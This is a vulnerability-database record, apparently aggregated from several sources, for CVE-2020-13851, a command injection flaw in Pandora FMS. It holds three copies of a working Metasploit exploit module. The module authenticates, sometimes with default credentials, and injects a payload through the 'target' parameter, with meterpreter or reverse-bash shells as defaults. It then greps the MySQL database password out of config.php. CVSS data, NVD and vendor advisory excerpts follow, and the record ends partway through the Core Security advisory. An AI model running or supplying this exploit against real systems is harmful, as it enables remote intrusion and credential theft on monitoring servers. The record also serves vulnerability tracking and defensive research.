This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).
{"id": "1337DAY-ID-34669", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pandora FMS 7.0 NG 7XX Remote Command Execution Exploit", "description": "This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. 
This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).", "published": "2020-07-12T00:00:00", "modified": "2020-07-12T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/34669", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2020-13851"], "immutableFields": [], "lastseen": "2021-12-17T05:20:00", "viewCount": 161, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0517"]}, {"type": "coresecurity", "idList": ["CORE-2020-0010"]}, {"type": "cve", "idList": ["CVE-2020-13851"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-PANDORA_FMS_EVENTS_EXEC-"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158390"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0517"]}, {"type": "cve", "idList": ["CVE-2020-13851"]}, {"type": "metasploit", "idList": 
["MSF:EXPLOIT/WINDOWS/HTTP/HTTPDX_TOLOG_FORMAT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158390"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/34669", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pandora FMS Events Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability (CVE-2020-13851) in Pandora\n FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps\n older versions) in order to execute arbitrary commands.\n\n This module takes advantage of a command injection vulnerability in the\n `Events` feature of Pandora FMS. This flaw allows users to execute\n arbitrary commands via the `target` parameter in HTTP POST requests to\n the `Events` function. After authenticating to the target, the module\n attempts to exploit this flaw by issuing such an HTTP POST request,\n with the `target` parameter set to contain the payload. If a shell is\n obtained, the module will try to obtain the local MySQL database\n password via a simple `grep` command on the plaintext\n `/var/www/html/pandora_console/include/config.php` file.\n\n Valid credentials for a Pandora FMS account are required. 
The account\n does not need to have admin privileges.\n This module has been successfully tested on Pandora 7.0 NG 744 running\n on CentOS 7 (the official virtual appliance ISO for this version).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Fernando Catoira', # Discovery\n 'Julio Sanchez', # Discovery\n 'Erik Wynter' # @wyntererik - Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2020-13851'], # RCE via the `events` feature\n ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']\n ],\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],\n 'Targets' =>\n [\n [\n 'Linux (x86)', {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-06-04',\n 'DefaultTarget' => 1\n )\n )\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])\n ]\n end\n\n def check\n vprint_status('Running check')\n res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')\n\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')\n return CheckCode::Safe('Target is not a Pandora FMS application.')\n end\n\n @cookie = res.get_cookies\n html = res.get_html_document\n full_version = html.at('div[@id=\"ver_num\"]')\n\n if 
full_version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n full_version = full_version.text\n\n version = full_version[1..-1].sub('NG', '')\n\n if version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n version = Gem::Version.new version\n\n unless version <= Gem::Version.new('7.0.744')\n return CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n CheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n def login(user, pass)\n vprint_status \"Authenticating as #{user} ...\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => @cookie,\n 'vars_get' => { 'login' => '1' },\n 'vars_post' => {\n 'nick' => user,\n 'pass' => pass,\n 'login_button' => 'Login'\n }\n })\n\n unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good \"Authenticated as user #{user}.\"\n end\n\n def on_new_session(client)\n super\n if target.arch.first == ARCH_CMD\n print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')\n client.shell_write(\"grep dbpass include/config.php\\n\")\n else\n print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. 
The default privileged user is `root`.')\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status('Executing payload...')\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax.php'),\n 'cookie' => @cookie,\n 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer' => full_uri('index.php'),\n 'vars_get' => {\n 'sec' => 'eventos',\n 'sec2' => 'operation/events/events'\n },\n 'vars_post' => {\n 'page' => 'include/ajax/events',\n 'perform_event_response' => '10000000',\n 'target' => cmd.to_s,\n 'response_id' => '1'\n }\n }, 0) # the server will not send a response, so the module shouldn't wait for one\n end\n\n def exploit\n login(datastore['USERNAME'], datastore['PASSWORD'])\n\n if target.arch.first == ARCH_CMD\n execute_command payload.encoded\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1660004461, "score": 1660009287}, "_internal": {"score_hash": "9ab77426b7635b8d19720e242eda4d0e"}}
{"metasploit": [{"lastseen": "2022-06-24T08:39:13", "description": "This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the `target` parameter in HTTP POST requests to the `Events` function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the `target` parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php` file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T20:21:12", "type": "metasploit", "title": "Pandora FMS Events Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13851"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-LINUX-HTTP-PANDORA_FMS_EVENTS_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/pandora_fms_events_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pandora FMS Events Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability (CVE-2020-13851) in Pandora\n FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps\n older versions) in order to execute arbitrary commands.\n\n This module takes advantage of a command injection vulnerability in the\n `Events` feature of Pandora FMS. This flaw allows users to execute\n arbitrary commands via the `target` parameter in HTTP POST requests to\n the `Events` function. After authenticating to the target, the module\n attempts to exploit this flaw by issuing such an HTTP POST request,\n with the `target` parameter set to contain the payload. If a shell is\n obtained, the module will try to obtain the local MySQL database\n password via a simple `grep` command on the plaintext\n `/var/www/html/pandora_console/include/config.php` file.\n\n Valid credentials for a Pandora FMS account are required. 
The account\n does not need to have admin privileges.\n This module has been successfully tested on Pandora 7.0 NG 744 running\n on CentOS 7 (the official virtual appliance ISO for this version).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Fernando Catoira', # Discovery\n 'Julio Sanchez', # Discovery\n 'Erik Wynter' # @wyntererik - Metasploit\n ],\n 'References' => [\n ['CVE', '2020-13851'], # RCE via the `events` feature\n ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']\n ],\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-06-04',\n 'DefaultTarget' => 1\n )\n )\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])\n ]\n end\n\n def check\n vprint_status('Running check')\n res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')\n\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')\n return CheckCode::Safe('Target is not a Pandora FMS application.')\n end\n\n @cookie = res.get_cookies\n html = res.get_html_document\n full_version = html.at('div[@id=\"ver_num\"]')\n\n if full_version.blank?\n 
return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n full_version = full_version.text\n\n version = full_version[1..-1].sub('NG', '')\n\n if version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n version = Rex::Version.new version\n\n unless version <= Rex::Version.new('7.0.744')\n return CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n CheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n def login(user, pass)\n vprint_status \"Authenticating as #{user} ...\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => @cookie,\n 'vars_get' => { 'login' => '1' },\n 'vars_post' => {\n 'nick' => user,\n 'pass' => pass,\n 'login_button' => 'Login'\n }\n })\n\n unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good \"Authenticated as user #{user}.\"\n end\n\n def on_new_session(client)\n super\n if target.arch.first == ARCH_CMD\n print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')\n client.shell_write(\"grep dbpass include/config.php\\n\")\n else\n print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. 
The default privileged user is `root`.')\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status('Executing payload...')\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax.php'),\n 'cookie' => @cookie,\n 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer' => full_uri('index.php'),\n 'vars_get' => {\n 'sec' => 'eventos',\n 'sec2' => 'operation/events/events'\n },\n 'vars_post' => {\n 'page' => 'include/ajax/events',\n 'perform_event_response' => '10000000',\n 'target' => cmd.to_s,\n 'response_id' => '1'\n }\n }, 0) # the server will not send a response, so the module shouldn't wait for one\n end\n\n def exploit\n login(datastore['USERNAME'], datastore['PASSWORD'])\n\n if target.arch.first == ARCH_CMD\n execute_command payload.encoded\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/pandora_fms_events_exec.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-07-12T17:17:46", "description": "", "cvss3": {}, "published": "2020-07-11T00:00:00", "type": "packetstorm", "title": "Pandora FMS 7.0 NG 7XX Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-13851"], "modified": "2020-07-11T00:00:00", "id": "PACKETSTORM:158390", "href": "https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pandora FMS Events Remote Command 
Execution', \n'Description' => %q{ \nThis module exploits a vulnerability (CVE-2020-13851) in Pandora \nFMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps \nolder versions) in order to execute arbitrary commands. \n \nThis module takes advantage of a command injection vulnerability in the \n`Events` feature of Pandora FMS. This flaw allows users to execute \narbitrary commands via the `target` parameter in HTTP POST requests to \nthe `Events` function. After authenticating to the target, the module \nattempts to exploit this flaw by issuing such an HTTP POST request, \nwith the `target` parameter set to contain the payload. If a shell is \nobtained, the module will try to obtain the local MySQL database \npassword via a simple `grep` command on the plaintext \n`/var/www/html/pandora_console/include/config.php` file. \n \nValid credentials for a Pandora FMS account are required. The account \ndoes not need to have admin privileges. \nThis module has been successfully tested on Pandora 7.0 NG 744 running \non CentOS 7 (the official virtual appliance ISO for this version). 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Fernando Catoira', # Discovery \n'Julio Sanchez', # Discovery \n'Erik Wynter' # @wyntererik - Metasploit \n], \n'References' => \n[ \n['CVE', '2020-13851'], # RCE via the `events` feature \n['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities'] \n], \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], \n'Targets' => \n[ \n[ \n'Linux (x86)', { \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux (x64)', { \n'Arch' => ARCH_X64, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux (cmd)', { \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => '2020-06-04', \n'DefaultTarget' => 1 \n) \n) \nregister_options [ \nOptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']), \nOptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), \nOptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora']) \n] \nend \n \ndef check \nvprint_status('Running check') \nres = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php') \n \nunless res \nreturn CheckCode::Unknown('Connection failed.') \nend \n \nunless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>') \nreturn CheckCode::Safe('Target is not a Pandora FMS application.') \nend \n \n@cookie = res.get_cookies \nhtml = res.get_html_document \nfull_version = html.at('div[@id=\"ver_num\"]') \n \nif full_version.blank? 
\nreturn CheckCode::Detected('Could not determine the Pandora FMS version.') \nend \n \nfull_version = full_version.text \n \nversion = full_version[1..-1].sub('NG', '') \n \nif version.blank? \nreturn CheckCode::Detected('Could not determine the Pandora FMS version.') \nend \n \nversion = Gem::Version.new version \n \nunless version <= Gem::Version.new('7.0.744') \nreturn CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\") \nend \n \nCheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\") \nend \n \ndef login(user, pass) \nvprint_status \"Authenticating as #{user} ...\" \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'cookie' => @cookie, \n'vars_get' => { 'login' => '1' }, \n'vars_post' => { \n'nick' => user, \n'pass' => pass, \n'login_button' => 'Login' \n} \n}) \n \nunless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>') \nfail_with Failure::NoAccess, 'Authentication failed' \nend \n \nprint_good \"Authenticated as user #{user}.\" \nend \n \ndef on_new_session(client) \nsuper \nif target.arch.first == ARCH_CMD \nprint_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.') \nclient.shell_write(\"grep dbpass include/config.php\\n\") \nelse \nprint_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. 
The default privileged user is `root`.') \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status('Executing payload...') \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'ajax.php'), \n'cookie' => @cookie, \n'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', \n'Referer' => full_uri('index.php'), \n'vars_get' => { \n'sec' => 'eventos', \n'sec2' => 'operation/events/events' \n}, \n'vars_post' => { \n'page' => 'include/ajax/events', \n'perform_event_response' => '10000000', \n'target' => cmd.to_s, \n'response_id' => '1' \n} \n}, 0) # the server will not send a response, so the module shouldn't wait for one \nend \n \ndef exploit \nlogin(datastore['USERNAME'], datastore['PASSWORD']) \n \nif target.arch.first == ARCH_CMD \nexecute_command payload.encoded \nelse \nexecute_cmdstager(background: true) \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158390/pandora_fms_events_exec.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-27T17:39:18", "description": "Artica Pandora FMS 7.44 allows remote command execution via the events feature.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-11T03:15:00", "type": "cve", "title": "CVE-2020-13851", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13851"], "modified": "2022-04-27T14:16:00", "cpe": ["cpe:/a:pandorafms:pandora_fms:7.44"], "id": "CVE-2020-13851", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13851", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:09", "description": "A remote code execution vulnerability exists in Pandora FMS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-20T00:00:00", "type": "checkpoint_advisories", "title": "Pandora FMS Remote Code Execution (CVE-2020-13851; CVE-2020-13852; CVE-2020-13855)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-13851", "CVE-2020-13852", "CVE-2020-13855"], "modified": "2020-06-20T00:00:00", "id": "CPAI-2020-0517", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "coresecurity": [{"lastseen": "2022-08-12T02:15:14", "description": "## 1\\. Advisory Information\n\n**Title**: Pandora FMS Community Multiple Vulnerabilities \n**Advisory ID**: CORE-2020-0010 \n**Advisory URL**: www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities \n**Date published**: 2020-06-09 \n**Date of last update**: 2020-06-09 \n**Vendors contacted:** [\u00c1rtica ST](<https://pandorafms.org/>) \\- Pandora FMS development team \n**Release mode:** Coordinated release\n\n## 2\\. Vulnerability Information\n\n**Class**: Unrestricted Upload of File with Dangerous Type [[CWE-434](<https://cwe.mitre.org/data/definitions/434.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)], Improper Access Control [[CWE-284](<https://cwe.mitre.org/data/definitions/284.html>)], Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) [[CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)]\n\n**Impact:** Code execution, Privilege Escalation \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **Yes \n**CVE Name: **[CVE-2020-13850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13850>), [CVE-2020-13851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851>), [CVE-2020-13852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13852>), [CVE-2020-13853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13853>), [CVE-2020-13854](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13854>), [CVE-2020-13855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13855>)\n\n## 3\\. 
Vulnerability Description\n\n[\u00c1rtica ST](<https://pandorafms.org/>)[1] is a Spanish based software company focused on cybersecurity and systems management. \u00c1rtica ST created, develops, and distributes Pandora FMS, a monitoring solution for IT environments. Pandora FMS provides visual monitoring of the status of networks, servers, applications, and other parts of an organization\u2019s infrastructure. Both an open source version and enterprise edition are available. \n\nMultiple vulnerabilities were found in the Virtual Appliance and Docker versions, which would allow a remote authenticated attacker to upload arbitrary files. This could lead to the execution of arbitrary commands with root privileges.\n\n## 4\\. Vulnerable Packages\n\n * Pandora FMS 7.0 NG 743 and 742 Virtual Appliance ISO\n * Pandora FMS 7.0 NG 744 Docker version\n * Pandora FMS 7.0 NG 744 Virtual Appliance ISO. (In this version, the service must be enabled first by the administrator in the console shell in order to exploit the vulnerability described in 7.4.)\n\nOther products and [versions](<https://pandorafms.com/downloads/whats-new-745-EN.pdf>)[2] might be affected, but have not yet been tested.\n\n## 5\\. Vendor Information, Solutions, and Workarounds\n\n\u00c1rtica ST has released version [746](<https://pandorafms.com/downloads/whats-new-746-EN.pdf>)[3], which fixes the reported issues.\n\n## 6\\. Credits\n\nThis vulnerability was discovered and researched by** ****Fernando Catoira** and **Julio Sanchez** from Core Security Consulting Services.\n\nThe publication of this advisory was coordinated by **Pablo A. Zurro** from the CoreLabs Advisories Team.\n\n## 7\\. Technical Description / Proof of Concept Code\n\n### 7.1 Remote Command Execution Via the Events Feature\n\n[[CVE-2020-13851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851>)] It is possible to abuse the `Events` feature to gain arbitrary command execution on the underlying operating system. 
